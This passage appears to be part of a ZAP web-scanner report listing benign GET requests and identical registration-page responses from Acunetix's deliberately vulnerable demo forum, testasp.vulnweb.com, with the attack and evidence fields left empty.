class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> 